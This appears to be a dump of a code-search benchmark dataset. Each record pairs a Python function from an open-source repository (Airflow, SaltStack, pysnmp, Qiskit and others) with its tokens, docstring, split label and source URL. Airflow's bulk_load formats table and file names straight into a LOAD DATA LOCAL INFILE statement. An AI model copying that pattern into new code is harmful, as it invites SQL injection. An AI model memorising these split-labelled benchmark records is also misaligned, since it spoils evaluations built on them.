def command_set_factory(bridge, group_number, led_type): """ Create command set for controlling a specific led group. :param bridge: The bridge the leds are connected to. :param group_number: The group number. :param led_type: The type of the leds. :return: The created command set. """ from limitlessled.group.commands.legacy import ( CommandSetWhiteLegacy, CommandSetRgbwLegacy) from limitlessled.group.commands.v6 import ( CommandSetBridgeLightV6, CommandSetWhiteV6, CommandSetDimmerV6, CommandSetRgbwV6, CommandSetRgbwwV6, CommandSetWrgbV6) command_sets = [CommandSetWhiteLegacy, CommandSetRgbwLegacy, CommandSetBridgeLightV6, CommandSetWhiteV6, CommandSetDimmerV6, CommandSetRgbwV6, CommandSetRgbwwV6, CommandSetWrgbV6] try: cls = next(cs for cs in command_sets if bridge.version in cs.SUPPORTED_VERSIONS and led_type in cs.SUPPORTED_LED_TYPES) return cls(group_number) except StopIteration: raise ValueError('There is no command set for ' 'specified bridge version and led type.')
[ "def", "command_set_factory", "(", "bridge", ",", "group_number", ",", "led_type", ")", ":", "from", "limitlessled", ".", "group", ".", "commands", ".", "legacy", "import", "(", "CommandSetWhiteLegacy", ",", "CommandSetRgbwLegacy", ")", "from", "limitlessled", "."...
Create command set for controlling a specific led group. :param bridge: The bridge the leds are connected to. :param group_number: The group number. :param led_type: The type of the leds. :return: The created command set.
[ "Create", "command", "set", "for", "controlling", "a", "specific", "led", "group", ".", ":", "param", "bridge", ":", "The", "bridge", "the", "leds", "are", "connected", "to", ".", ":", "param", "group_number", ":", "The", "group", "number", ".", ":", "pa...
python
train
apache/airflow
airflow/hooks/mysql_hook.py
https://github.com/apache/airflow/blob/b69c686ad8a0c89b9136bb4b31767257eb7b2597/airflow/hooks/mysql_hook.py#L107-L117
def bulk_load(self, table, tmp_file): """ Loads a tab-delimited file into a database table """ conn = self.get_conn() cur = conn.cursor() cur.execute(""" LOAD DATA LOCAL INFILE '{tmp_file}' INTO TABLE {table} """.format(tmp_file=tmp_file, table=table)) conn.commit()
[ "def", "bulk_load", "(", "self", ",", "table", ",", "tmp_file", ")", ":", "conn", "=", "self", ".", "get_conn", "(", ")", "cur", "=", "conn", ".", "cursor", "(", ")", "cur", ".", "execute", "(", "\"\"\"\n LOAD DATA LOCAL INFILE '{tmp_file}'\n ...
Loads a tab-delimited file into a database table
[ "Loads", "a", "tab", "-", "delimited", "file", "into", "a", "database", "table" ]
python
test
log2timeline/plaso
plaso/cli/helpers/database_config.py
https://github.com/log2timeline/plaso/blob/9c564698d2da3ffbe23607a3c54c0582ea18a6cc/plaso/cli/helpers/database_config.py#L22-L45
def AddArguments(cls, argument_group): """Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Args: argument_group (argparse._ArgumentGroup|argparse.ArgumentParser): argparse group. """ argument_group.add_argument( '--user', dest='username', type=str, action='store', default=cls._DEFAULT_USERNAME, metavar='USERNAME', required=False, help='The username used to connect to the database.') argument_group.add_argument( '--password', dest='password', type=str, action='store', default=cls._DEFAULT_PASSWORD, metavar='PASSWORD', help=( 'The password for the database user.')) argument_group.add_argument( '--db_name', '--db-name', dest='db_name', action='store', type=str, default=cls._DEFAULT_NAME, required=False, help=( 'The name of the database to connect to.')) server_config.ServerArgumentsHelper.AddArguments(argument_group)
[ "def", "AddArguments", "(", "cls", ",", "argument_group", ")", ":", "argument_group", ".", "add_argument", "(", "'--user'", ",", "dest", "=", "'username'", ",", "type", "=", "str", ",", "action", "=", "'store'", ",", "default", "=", "cls", ".", "_DEFAULT_U...
Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Args: argument_group (argparse._ArgumentGroup|argparse.ArgumentParser): argparse group.
[ "Adds", "command", "line", "arguments", "the", "helper", "supports", "to", "an", "argument", "group", "." ]
python
train
jtwhite79/pyemu
pyemu/prototypes/moouu.py
https://github.com/jtwhite79/pyemu/blob/c504d8e7a4097cec07655a6318d275739bd8148a/pyemu/prototypes/moouu.py#L255-L289
def crowd_distance(self,obs_df): """determine the crowding distance for each candidate solution Parameters ---------- obs_df : pandas.DataFrame dataframe with columns of observation names and rows of realizations Returns ------- crowd_distance : pandas.Series series with index of obs_df and values of crowd distance """ # initialize the distance container crowd_distance = pd.Series(data=0.0,index=obs_df.index) for name,direction in self.obs_dict.items(): # make a copy - wasteful, but easier obj_df = obs_df.loc[:,name].copy() # sort so that largest values are first obj_df.sort_values(ascending=False,inplace=True) # set the ends so they are always retained crowd_distance.loc[obj_df.index[0]] += self.max_distance crowd_distance.loc[obj_df.index[-1]] += self.max_distance # process the vector i = 1 for idx in obj_df.index[1:-1]: crowd_distance.loc[idx] += obj_df.iloc[i-1] - obj_df.iloc[i+1] i += 1 return crowd_distance
[ "def", "crowd_distance", "(", "self", ",", "obs_df", ")", ":", "# initialize the distance container", "crowd_distance", "=", "pd", ".", "Series", "(", "data", "=", "0.0", ",", "index", "=", "obs_df", ".", "index", ")", "for", "name", ",", "direction", "in", ...
determine the crowding distance for each candidate solution Parameters ---------- obs_df : pandas.DataFrame dataframe with columns of observation names and rows of realizations Returns ------- crowd_distance : pandas.Series series with index of obs_df and values of crowd distance
[ "determine", "the", "crowding", "distance", "for", "each", "candidate", "solution" ]
python
train
mapbox/mapbox-sdk-py
mapbox/encoding.py
https://github.com/mapbox/mapbox-sdk-py/blob/72d19dbcf2d254a6ea08129a726471fd21f13023/mapbox/encoding.py#L20-L56
def read_points(features): """ Iterable of features to a sequence of point tuples Where "features" can be either GeoJSON mappings or objects implementing the geo_interface """ for feature in features: if isinstance(feature, (tuple, list)) and len(feature) == 2: yield feature elif hasattr(feature, '__geo_interface__'): # An object implementing the geo_interface try: # Could be a Feature... geom = feature.__geo_interface__['geometry'] for pt in _geom_points(geom): yield pt except KeyError: # ... or a geometry directly for pt in _geom_points(feature.__geo_interface__): yield pt elif 'type' in feature and feature['type'] == 'Feature': # A GeoJSON-like mapping geom = feature['geometry'] for pt in _geom_points(geom): yield pt elif 'coordinates' in feature: geom = feature for pt in _geom_points(geom): yield pt else: raise InvalidFeatureError( "Unknown object: Not a GeoJSON Point feature or " "an object with __geo_interface__:\n{0}".format(feature))
[ "def", "read_points", "(", "features", ")", ":", "for", "feature", "in", "features", ":", "if", "isinstance", "(", "feature", ",", "(", "tuple", ",", "list", ")", ")", "and", "len", "(", "feature", ")", "==", "2", ":", "yield", "feature", "elif", "ha...
Iterable of features to a sequence of point tuples Where "features" can be either GeoJSON mappings or objects implementing the geo_interface
[ "Iterable", "of", "features", "to", "a", "sequence", "of", "point", "tuples", "Where", "features", "can", "be", "either", "GeoJSON", "mappings", "or", "objects", "implementing", "the", "geo_interface" ]
python
train
keans/lmnotify
lmnotify/lmnotify.py
https://github.com/keans/lmnotify/blob/b0a5282a582e5090852dc20fea8a135ca258d0d3/lmnotify/lmnotify.py#L599-L614
def alarm_set(self, time, wake_with_radio=False): """ set the alarm clock :param str time: time of the alarm (format: %H:%M:%S) :param bool wake_with_radio: if True, radio will be used for the alarm instead of beep sound """ # TODO: check for correct time format log.debug("alarm => set...") params = { "enabled": True, "time": time, "wake_with_radio": wake_with_radio } self._app_exec("com.lametric.clock", "clock.alarm", params=params)
[ "def", "alarm_set", "(", "self", ",", "time", ",", "wake_with_radio", "=", "False", ")", ":", "# TODO: check for correct time format", "log", ".", "debug", "(", "\"alarm => set...\"", ")", "params", "=", "{", "\"enabled\"", ":", "True", ",", "\"time\"", ":", "...
set the alarm clock :param str time: time of the alarm (format: %H:%M:%S) :param bool wake_with_radio: if True, radio will be used for the alarm instead of beep sound
[ "set", "the", "alarm", "clock" ]
python
train
carpedm20/ndrive
ndrive/models.py
https://github.com/carpedm20/ndrive/blob/ac58eaf8a8d46292ad752bb38047f65838b8ad2b/ndrive/models.py#L302-L334
def getDiskSpace(self, file_path, upload_path = '', overwrite = False): """getDiskSpace Args: file_path: Full path for a file you want to checkUpload upload_path: Ndrive path where you want to upload file ex) /Picture/ Returns: True: Possible to upload a file with a given file_size False: Impossible to upload a file with a given file_size """ self.checkAccount() url = nurls['checkUpload'] file_size = os.stat(file_path).st_size file_name = os.path.basename(file_path) now = datetime.datetime.now().isoformat() data = {'userid': self.user_id, 'useridx': self.useridx, 'getlastmodified': now, 'dstresource': upload_path + file_name, 'overwrite': overwrite, 'uploadsize': file_size, } r = self.session.post(nurls['getDiskSpace'], data = data) return resultManager(r.text)
[ "def", "getDiskSpace", "(", "self", ",", "file_path", ",", "upload_path", "=", "''", ",", "overwrite", "=", "False", ")", ":", "self", ".", "checkAccount", "(", ")", "url", "=", "nurls", "[", "'checkUpload'", "]", "file_size", "=", "os", ".", "stat", "...
getDiskSpace Args: file_path: Full path for a file you want to checkUpload upload_path: Ndrive path where you want to upload file ex) /Picture/ Returns: True: Possible to upload a file with a given file_size False: Impossible to upload a file with a given file_size
[ "getDiskSpace" ]
python
train
rwl/pylon
pyreto/auction.py
https://github.com/rwl/pylon/blob/916514255db1ae1661406f0283df756baf960d14/pyreto/auction.py#L106-L117
def _clearQuantities(self): """ Computes the cleared quantities for each offer/bid according to the dispatched output from the OPF solution. """ generators = [g for g in self.case.generators if not g.is_load] vLoads = [g for g in self.case.generators if g.is_load] for g in generators: self._clearQuantity(self.offers, g) for vl in vLoads: self._clearQuantity(self.bids, vl)
[ "def", "_clearQuantities", "(", "self", ")", ":", "generators", "=", "[", "g", "for", "g", "in", "self", ".", "case", ".", "generators", "if", "not", "g", ".", "is_load", "]", "vLoads", "=", "[", "g", "for", "g", "in", "self", ".", "case", ".", "...
Computes the cleared quantities for each offer/bid according to the dispatched output from the OPF solution.
[ "Computes", "the", "cleared", "quantities", "for", "each", "offer", "/", "bid", "according", "to", "the", "dispatched", "output", "from", "the", "OPF", "solution", "." ]
python
train
saltstack/salt
salt/utils/minions.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/utils/minions.py#L1026-L1030
def runner_check(self, auth_list, fun, args): ''' Check special API permissions ''' return self.spec_check(auth_list, fun, args, 'runner')
[ "def", "runner_check", "(", "self", ",", "auth_list", ",", "fun", ",", "args", ")", ":", "return", "self", ".", "spec_check", "(", "auth_list", ",", "fun", ",", "args", ",", "'runner'", ")" ]
Check special API permissions
[ "Check", "special", "API", "permissions" ]
python
train
seleniumbase/SeleniumBase
seleniumbase/fixtures/base_case.py
https://github.com/seleniumbase/SeleniumBase/blob/62e5b43ee1f90a9ed923841bdd53b1b38358f43a/seleniumbase/fixtures/base_case.py#L1683-L1693
def create_folder(self, folder): """ Creates a folder of the given name if it doesn't already exist. """ if folder.endswith("/"): folder = folder[:-1] if len(folder) < 1: raise Exception("Minimum folder name length = 1.") if not os.path.exists(folder): try: os.makedirs(folder) except Exception: pass
[ "def", "create_folder", "(", "self", ",", "folder", ")", ":", "if", "folder", ".", "endswith", "(", "\"/\"", ")", ":", "folder", "=", "folder", "[", ":", "-", "1", "]", "if", "len", "(", "folder", ")", "<", "1", ":", "raise", "Exception", "(", "\...
Creates a folder of the given name if it doesn't already exist.
[ "Creates", "a", "folder", "of", "the", "given", "name", "if", "it", "doesn", "t", "already", "exist", "." ]
python
train
zengbin93/zb
zb/crawlers/xinshipu.py
https://github.com/zengbin93/zb/blob/ccdb384a0b5801b459933220efcb71972c2b89a7/zb/crawlers/xinshipu.py#L20-L83
def get_recipe_detail(recipe_url): """从url中获取菜谱详细信息 :param recipe_url: str 菜谱url,如:https://www.xinshipu.com/zuofa/598775; https://www.xinshipu.com//zuofa/749342 :return:dict """ response = requests.get(recipe_url, headers=get_header()) html = BeautifulSoup(response.text, 'lxml') # 获取菜名 name = html.find("div", {"class": "re-up"}).h1.text # 主图 img = html.find("div", {"class": "gallery"}).a['href'] img = urljoin(HOME_URL, img) all_info = html.find_all("div", {"class": "dd"}) if len(all_info) == 4: # 简介 intro = re.sub('\n|\t|\r| ', '', all_info[0].text) material_i = 1 method_i = 2 else: intro = None material_i = 0 method_i = 1 # 食材 material = all_info[material_i].text.strip() material = re.sub('\r\n|\r\n \n|\n\n\n', '\n', material) # 做法 try: method_steps = html.find("ol", {"class": "re-step-wpic"}).find_all('li') method = [] for i, m in enumerate(method_steps, 1): step = dict(step_num=i) step['text'] = m.text.strip() if m.img: step['img_url'] = urljoin(HOME_URL, m.img['src']) method.append(step) except: method = all_info[method_i].text.strip() method = re.sub('\r\n|\r\n \n|\n\n\n\n', '\n', method) # 相关菜品 classify = all_info[-1].text.strip() if '\xa0\xa0' in classify: classify = classify.replace('\xa0\xa0', ' | ') else: classify = "" return { "name": name, "url": recipe_url, "img": img, "intro": intro, "material": material, "method": method, "classify": classify }
[ "def", "get_recipe_detail", "(", "recipe_url", ")", ":", "response", "=", "requests", ".", "get", "(", "recipe_url", ",", "headers", "=", "get_header", "(", ")", ")", "html", "=", "BeautifulSoup", "(", "response", ".", "text", ",", "'lxml'", ")", "# 获取菜名",...
从url中获取菜谱详细信息 :param recipe_url: str 菜谱url,如:https://www.xinshipu.com/zuofa/598775; https://www.xinshipu.com//zuofa/749342 :return:dict
[ "从url中获取菜谱详细信息" ]
python
train
Sanji-IO/sanji
sanji/model/__init__.py
https://github.com/Sanji-IO/sanji/blob/5c54cc2772bdfeae3337f785de1957237b828b34/sanji/model/__init__.py#L153-L174
def set(self, id, newObj): """Set a object Args: id (int): Target Object ID newObj (object): New object will be set Returns: Object: New object None: If specified object id is not found MultipleInvalid: If input object is invaild """ newObj = self.validation(newObj) for index in xrange(0, len(self.model.db)): if self.model.db[index]["id"] != id: continue newObj["id"] = id self.model.db[index] = self._cast_model(newObj) if not self._batch.enable.is_set(): self.model.save_db() return self.model.db[index] return None
[ "def", "set", "(", "self", ",", "id", ",", "newObj", ")", ":", "newObj", "=", "self", ".", "validation", "(", "newObj", ")", "for", "index", "in", "xrange", "(", "0", ",", "len", "(", "self", ".", "model", ".", "db", ")", ")", ":", "if", "self"...
Set a object Args: id (int): Target Object ID newObj (object): New object will be set Returns: Object: New object None: If specified object id is not found MultipleInvalid: If input object is invaild
[ "Set", "a", "object", "Args", ":", "id", "(", "int", ")", ":", "Target", "Object", "ID", "newObj", "(", "object", ")", ":", "New", "object", "will", "be", "set", "Returns", ":", "Object", ":", "New", "object", "None", ":", "If", "specified", "object"...
python
train
juju/charm-helpers
charmhelpers/core/host.py
https://github.com/juju/charm-helpers/blob/aa785c40c3b7a8c69dbfbc7921d6b9f30142e171/charmhelpers/core/host.py#L859-L868
def get_nic_mtu(nic): """Return the Maximum Transmission Unit (MTU) for a network interface.""" cmd = ['ip', 'addr', 'show', nic] ip_output = subprocess.check_output(cmd).decode('UTF-8').split('\n') mtu = "" for line in ip_output: words = line.split() if 'mtu' in words: mtu = words[words.index("mtu") + 1] return mtu
[ "def", "get_nic_mtu", "(", "nic", ")", ":", "cmd", "=", "[", "'ip'", ",", "'addr'", ",", "'show'", ",", "nic", "]", "ip_output", "=", "subprocess", ".", "check_output", "(", "cmd", ")", ".", "decode", "(", "'UTF-8'", ")", ".", "split", "(", "'\\n'", ...
Return the Maximum Transmission Unit (MTU) for a network interface.
[ "Return", "the", "Maximum", "Transmission", "Unit", "(", "MTU", ")", "for", "a", "network", "interface", "." ]
python
train
rcsb/mmtf-python
mmtf/utils/decoder_utils.py
https://github.com/rcsb/mmtf-python/blob/899bb877ca1b32a9396803d38c5bf38a2520754e/mmtf/utils/decoder_utils.py#L150-L159
def add_entity_info( data_api, struct_inflator): """Add the entity info to the structure. :param data_api the interface to the decoded data :param struct_inflator the interface to put the data into the client object """ for entity in data_api.entity_list: struct_inflator.set_entity_info(entity["chainIndexList"], entity["sequence"], entity["description"], entity["type"])
[ "def", "add_entity_info", "(", "data_api", ",", "struct_inflator", ")", ":", "for", "entity", "in", "data_api", ".", "entity_list", ":", "struct_inflator", ".", "set_entity_info", "(", "entity", "[", "\"chainIndexList\"", "]", ",", "entity", "[", "\"sequence\"", ...
Add the entity info to the structure. :param data_api the interface to the decoded data :param struct_inflator the interface to put the data into the client object
[ "Add", "the", "entity", "info", "to", "the", "structure", ".", ":", "param", "data_api", "the", "interface", "to", "the", "decoded", "data", ":", "param", "struct_inflator", "the", "interface", "to", "put", "the", "data", "into", "the", "client", "object" ]
python
train
manns/pyspread
pyspread/src/model/model.py
https://github.com/manns/pyspread/blob/0e2fd44c2e0f06605efc3058c20a43a8c1f9e7e0/pyspread/src/model/model.py#L1360-L1368
def reload_modules(self): """Reloads modules that are available in cells""" import src.lib.charts as charts from src.gui.grid_panels import vlcpanel_factory modules = [charts, bz2, base64, re, ast, sys, wx, numpy, datetime] for module in modules: reload(module)
[ "def", "reload_modules", "(", "self", ")", ":", "import", "src", ".", "lib", ".", "charts", "as", "charts", "from", "src", ".", "gui", ".", "grid_panels", "import", "vlcpanel_factory", "modules", "=", "[", "charts", ",", "bz2", ",", "base64", ",", "re", ...
Reloads modules that are available in cells
[ "Reloads", "modules", "that", "are", "available", "in", "cells" ]
python
train
BD2KGenomics/toil-scripts
src/toil_scripts/rnaseq_unc/rnaseq_unc_pipeline.py
https://github.com/BD2KGenomics/toil-scripts/blob/f878d863defcdccaabb7fe06f991451b7a198fb7/src/toil_scripts/rnaseq_unc/rnaseq_unc_pipeline.py#L578-L604
def bamsort_and_index(job, job_vars): """ Sorts bam file and produces index file job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O rg_alignments = return_input_paths(job, work_dir, ids, 'rg_alignments.bam') output = os.path.join(work_dir, 'sorted.bam') # Command -- second argument is "Output Prefix" cmd1 = ['sort', docker_path(rg_alignments), docker_path('sorted')] cmd2 = ['index', docker_path(output)] docker_call(tool='quay.io/ucsc_cgl/samtools:0.1.19--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=cmd1, work_dir=work_dir, sudo=sudo) docker_call(tool='quay.io/ucsc_cgl/samtools:0.1.19--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=cmd2, work_dir=work_dir, sudo=sudo) # Write to FileStore ids['sorted.bam'] = job.fileStore.writeGlobalFile(output) ids['sorted.bam.bai'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'sorted.bam.bai')) # Run child job output_ids = job.addChildJobFn(sort_bam_by_reference, job_vars, disk='50 G').rv() rseq_id = job.addChildJobFn(rseq_qc, job_vars, disk='20 G').rv() return rseq_id, output_ids
[ "def", "bamsort_and_index", "(", "job", ",", "job_vars", ")", ":", "# Unpack variables", "input_args", ",", "ids", "=", "job_vars", "work_dir", "=", "job", ".", "fileStore", ".", "getLocalTempDir", "(", ")", "sudo", "=", "input_args", "[", "'sudo'", "]", "# ...
Sorts bam file and produces index file job_vars: tuple Tuple of dictionaries: input_args and ids
[ "Sorts", "bam", "file", "and", "produces", "index", "file" ]
python
train
juju/charm-helpers
charmhelpers/contrib/database/mysql.py
https://github.com/juju/charm-helpers/blob/aa785c40c3b7a8c69dbfbc7921d6b9f30142e171/charmhelpers/contrib/database/mysql.py#L299-L370
def set_mysql_password(self, username, password): """Update a mysql password for the provided username changing the leader settings To update root's password pass `None` in the username """ if username is None: username = 'root' # get root password via leader-get, it may be that in the past (when # changes to root-password were not supported) the user changed the # password, so leader-get is more reliable source than # config.previous('root-password'). rel_username = None if username == 'root' else username cur_passwd = self.get_mysql_password(rel_username) # password that needs to be set new_passwd = password # update password for all users (e.g. root@localhost, root@::1, etc) try: self.connect(user=username, password=cur_passwd) cursor = self.connection.cursor() except MySQLdb.OperationalError as ex: raise MySQLSetPasswordError(('Cannot connect using password in ' 'leader settings (%s)') % ex, ex) try: # NOTE(freyes): Due to skip-name-resolve root@$HOSTNAME account # fails when using SET PASSWORD so using UPDATE against the # mysql.user table is needed, but changes to this table are not # replicated across the cluster, so this update needs to run in # all the nodes. 
More info at # http://galeracluster.com/documentation-webpages/userchanges.html release = CompareHostReleases(lsb_release()['DISTRIB_CODENAME']) if release < 'bionic': SQL_UPDATE_PASSWD = ("UPDATE mysql.user SET password = " "PASSWORD( %s ) WHERE user = %s;") else: # PXC 5.7 (introduced in Bionic) uses authentication_string SQL_UPDATE_PASSWD = ("UPDATE mysql.user SET " "authentication_string = " "PASSWORD( %s ) WHERE user = %s;") cursor.execute(SQL_UPDATE_PASSWD, (new_passwd, username)) cursor.execute('FLUSH PRIVILEGES;') self.connection.commit() except MySQLdb.OperationalError as ex: raise MySQLSetPasswordError('Cannot update password: %s' % str(ex), ex) finally: cursor.close() # check the password was changed try: self.connect(user=username, password=new_passwd) self.execute('select 1;') except MySQLdb.OperationalError as ex: raise MySQLSetPasswordError(('Cannot connect using new password: ' '%s') % str(ex), ex) if not is_leader(): log('Only the leader can set a new password in the relation', level=DEBUG) return for key in self.passwd_keys(rel_username): _password = leader_get(key) if _password: log('Updating password for %s (%s)' % (key, rel_username), level=DEBUG) leader_set(settings={key: new_passwd})
[ "def", "set_mysql_password", "(", "self", ",", "username", ",", "password", ")", ":", "if", "username", "is", "None", ":", "username", "=", "'root'", "# get root password via leader-get, it may be that in the past (when", "# changes to root-password were not supported) the user...
Update a mysql password for the provided username changing the leader settings To update root's password pass `None` in the username
[ "Update", "a", "mysql", "password", "for", "the", "provided", "username", "changing", "the", "leader", "settings" ]
python
train
guaix-ucm/pyemir
emirdrp/util/sextractor.py
https://github.com/guaix-ucm/pyemir/blob/fef6bbabcb13f80123cafd1800a0f508a3c21702/emirdrp/util/sextractor.py#L419-L476
def setup(self, path=None): """ Look for SExtractor program ('sextractor', or 'sex'). If a full path is provided, only this path is checked. Raise a SExtractorException if it failed. Return program and version if it succeed. """ # -- Finding sextractor program and its version # first look for 'sextractor', then 'sex' candidates = ['sextractor', 'sex'] if (path): candidates = [path] selected = None for candidate in candidates: try: p = subprocess.Popen(candidate, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True) (_out_err, _in) = (p.stdout, p.stdin) versionline = _out_err.read() if (versionline.find("SExtractor") != -1): selected = candidate break except IOError: continue if not(selected): raise SExtractorException( """ Cannot find SExtractor program. Check your PATH, or provide the SExtractor program path in the constructor. """ ) _program = selected # print versionline _version_match = re.search("[Vv]ersion ([0-9\.])+", versionline) if not _version_match: raise SExtractorException( "Cannot determine SExtractor version." ) _version = _version_match.group()[8:] if not _version: raise SExtractorException( "Cannot determine SExtractor version." ) # print "Use " + self.program + " [" + self.version + "]" return _program, _version
[ "def", "setup", "(", "self", ",", "path", "=", "None", ")", ":", "# -- Finding sextractor program and its version", "# first look for 'sextractor', then 'sex'", "candidates", "=", "[", "'sextractor'", ",", "'sex'", "]", "if", "(", "path", ")", ":", "candidates", "="...
Look for SExtractor program ('sextractor', or 'sex'). If a full path is provided, only this path is checked. Raise a SExtractorException if it failed. Return program and version if it succeed.
[ "Look", "for", "SExtractor", "program", "(", "sextractor", "or", "sex", ")", ".", "If", "a", "full", "path", "is", "provided", "only", "this", "path", "is", "checked", ".", "Raise", "a", "SExtractorException", "if", "it", "failed", ".", "Return", "program"...
python
train
theislab/scvelo
scvelo/preprocessing/utils.py
https://github.com/theislab/scvelo/blob/c7a96d70edfe705e86bf364434a9527d4fd8df11/scvelo/preprocessing/utils.py#L417-L423
def recipe_velocity(adata, min_counts=3, min_counts_u=3, n_top_genes=None, n_pcs=30, n_neighbors=30, log=True, copy=False): """Runs pp.filter_and_normalize() and pp.moments() """ from .moments import moments filter_and_normalize(adata, min_counts=min_counts, min_counts_u=min_counts_u, n_top_genes=n_top_genes, log=log) moments(adata, n_neighbors=n_neighbors, n_pcs=n_pcs) return adata if copy else None
[ "def", "recipe_velocity", "(", "adata", ",", "min_counts", "=", "3", ",", "min_counts_u", "=", "3", ",", "n_top_genes", "=", "None", ",", "n_pcs", "=", "30", ",", "n_neighbors", "=", "30", ",", "log", "=", "True", ",", "copy", "=", "False", ")", ":",...
Runs pp.filter_and_normalize() and pp.moments()
[ "Runs", "pp", ".", "filter_and_normalize", "()", "and", "pp", ".", "moments", "()" ]
python
train
zhanglab/psamm
psamm/balancecheck.py
https://github.com/zhanglab/psamm/blob/dc427848c4f9d109ca590f0afa024c63b685b3f4/psamm/balancecheck.py#L65-L88
def reaction_formula(reaction, compound_formula): """Calculate formula compositions for both sides of the specified reaction. If the compounds in the reaction all have formula, then calculate and return the chemical compositions for both sides, otherwise return `None`. Args: reaction: :class:`psamm.reaction.Reaction`. compound_formula: a map from compound id to formula. """ def multiply_formula(compound_list): for compound, count in compound_list: yield count * compound_formula[compound.name] for compound, _ in reaction.compounds: if compound.name not in compound_formula: return None else: left_form = reduce( operator.or_, multiply_formula(reaction.left), Formula()) right_form = reduce( operator.or_, multiply_formula(reaction.right), Formula()) return left_form, right_form
[ "def", "reaction_formula", "(", "reaction", ",", "compound_formula", ")", ":", "def", "multiply_formula", "(", "compound_list", ")", ":", "for", "compound", ",", "count", "in", "compound_list", ":", "yield", "count", "*", "compound_formula", "[", "compound", "."...
Calculate formula compositions for both sides of the specified reaction. If the compounds in the reaction all have formula, then calculate and return the chemical compositions for both sides, otherwise return `None`. Args: reaction: :class:`psamm.reaction.Reaction`. compound_formula: a map from compound id to formula.
[ "Calculate", "formula", "compositions", "for", "both", "sides", "of", "the", "specified", "reaction", "." ]
python
train
etingof/pysnmp
pysnmp/smi/mibs/SNMPv2-TC.py
https://github.com/etingof/pysnmp/blob/cde062dd42f67dfd2d7686286a322d40e9c3a4b7/pysnmp/smi/mibs/SNMPv2-TC.py#L120-L248
def prettyOut(self, value): # override asn1 type method """Implements DISPLAY-HINT evaluation""" if self.displayHint and (self.__integer.isSuperTypeOf(self, matchConstraints=False) and not self.getNamedValues() or self.__unsigned32.isSuperTypeOf(self, matchConstraints=False) or self.__timeticks.isSuperTypeOf(self, matchConstraints=False)): _ = lambda t, f=0: (t, f) displayHintType, decimalPrecision = _(*self.displayHint.split('-')) if displayHintType == 'x': return '0x%x' % value elif displayHintType == 'd': try: return '%.*f' % (int(decimalPrecision), float(value) / pow(10, int(decimalPrecision))) except Exception as exc: raise SmiError( 'float evaluation error: %s' % exc ) elif displayHintType == 'o': return '0%o' % value elif displayHintType == 'b': runningValue = value outputValue = ['B'] while runningValue: outputValue.insert(0, '%d' % (runningValue & 0x01)) runningValue >>= 1 return ''.join(outputValue) else: raise SmiError( 'Unsupported numeric type spec "%s" at %s' % (displayHintType, self.__class__.__name__) ) elif self.displayHint and self.__octetString.isSuperTypeOf(self, matchConstraints=False): outputValue = '' runningValue = OctetString(value).asOctets() displayHint = self.displayHint while runningValue and displayHint: # 1 if displayHint[0] == '*': repeatIndicator = repeatCount = octets.oct2int(runningValue[0]) displayHint = displayHint[1:] runningValue = runningValue[1:] else: repeatCount = 1 repeatIndicator = None # 2 octetLength = '' while displayHint and displayHint[0] in string.digits: octetLength += displayHint[0] displayHint = displayHint[1:] # length is manatory, but people ignore that if not octetLength: octetLength = len(runningValue) try: octetLength = int(octetLength) except Exception: raise SmiError( 'Bad octet length: %s' % octetLength ) if not displayHint: raise SmiError( 'Short octet length: %s' % self.displayHint ) # 3 displayFormat = displayHint[0] displayHint = displayHint[1:] # 4 if displayHint and displayHint[0] not in 
string.digits and displayHint[0] != '*': displaySep = displayHint[0] displayHint = displayHint[1:] else: displaySep = '' # 5 if displayHint and displaySep and repeatIndicator is not None: repeatTerminator = displayHint[0] displaySep = '' displayHint = displayHint[1:] else: repeatTerminator = None while repeatCount: repeatCount -= 1 if displayFormat == 'a': outputValue += runningValue[:octetLength].decode('ascii', 'ignore') elif displayFormat == 't': outputValue += runningValue[:octetLength].decode('utf-8', 'ignore') elif displayFormat in ('x', 'd', 'o'): number = 0 numberString = runningValue[:octetLength] while numberString: number <<= 8 try: number |= octets.oct2int(numberString[0]) numberString = numberString[1:] except Exception as exc: raise SmiError( 'Display format eval failure: %s: %s' % (numberString, exc) ) if displayFormat == 'x': outputValue += '%02x' % number elif displayFormat == 'o': outputValue += '%03o' % number else: outputValue += '%d' % number else: raise SmiError( 'Unsupported display format char: %s' % displayFormat ) if runningValue and repeatTerminator: outputValue += repeatTerminator runningValue = runningValue[octetLength:] if runningValue and displaySep: outputValue += displaySep if not displayHint: displayHint = self.displayHint return outputValue for base in inspect.getmro(self.__class__): if not issubclass(base, TextualConvention) and issubclass(base, Asn1Item): return base.prettyOut(self, value) raise SmiError('TEXTUAL-CONVENTION has no underlying SNMP base type')
[ "def", "prettyOut", "(", "self", ",", "value", ")", ":", "# override asn1 type method", "if", "self", ".", "displayHint", "and", "(", "self", ".", "__integer", ".", "isSuperTypeOf", "(", "self", ",", "matchConstraints", "=", "False", ")", "and", "not", "self...
Implements DISPLAY-HINT evaluation
[ "Implements", "DISPLAY", "-", "HINT", "evaluation" ]
python
train
Qiskit/qiskit-terra
qiskit/transpiler/layout.py
https://github.com/Qiskit/qiskit-terra/blob/d4f58d903bc96341b816f7c35df936d6421267d1/qiskit/transpiler/layout.py#L118-L121
def is_virtual(value): """Checks if value has the format of a virtual qubit """ return value is None or isinstance(value, tuple) and len(value) == 2 and isinstance( value[0], Register) and isinstance(value[1], int)
[ "def", "is_virtual", "(", "value", ")", ":", "return", "value", "is", "None", "or", "isinstance", "(", "value", ",", "tuple", ")", "and", "len", "(", "value", ")", "==", "2", "and", "isinstance", "(", "value", "[", "0", "]", ",", "Register", ")", "...
Checks if value has the format of a virtual qubit
[ "Checks", "if", "value", "has", "the", "format", "of", "a", "virtual", "qubit" ]
python
test
sdispater/pendulum
pendulum/date.py
https://github.com/sdispater/pendulum/blob/94d28b0d3cb524ae02361bd1ed7ea03e2e655e4e/pendulum/date.py#L59-L67
